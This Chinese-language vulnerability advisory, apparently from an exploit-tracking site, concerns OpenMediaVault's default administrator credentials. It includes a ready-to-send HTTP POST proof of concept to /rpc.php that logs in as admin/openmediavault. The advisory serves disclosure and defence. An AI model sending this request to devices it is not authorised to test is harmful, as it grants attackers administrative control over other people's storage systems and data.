OpenMediaVault /rpc.php 默认口令漏洞

2026-02-28 OpenMediaVault PoC Public

Description

OpenMediaVault 是基于 Debian Linux 的下一代网络附加存储(NAS)解决方案。它包含了 SSH、(S)FTP、SMB/CIFS、RSync 等多种服务,随时可用。得益于框架的模块化设计,可以通过插件进行增强。OpenMediaVault 主要设计用于小型办公室或家庭办公室,但并不限于这些场景。它是一种简单易用的开箱即用解决方案,允许每个人都无需深入了解即可安装和管理网络附加存储。OpenMediaVault存在默认管理账户 admin/openmediavault。攻击者可通过默认口令漏洞控制整个平台,使用管理员权限操作核心的功能。

PoC

POST /rpc.php HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 111
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Encoding: gzip
Connection: close

{"service":"Session","method":"login","params":{"username":"admin","password":"openmediavault"},"options":null}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities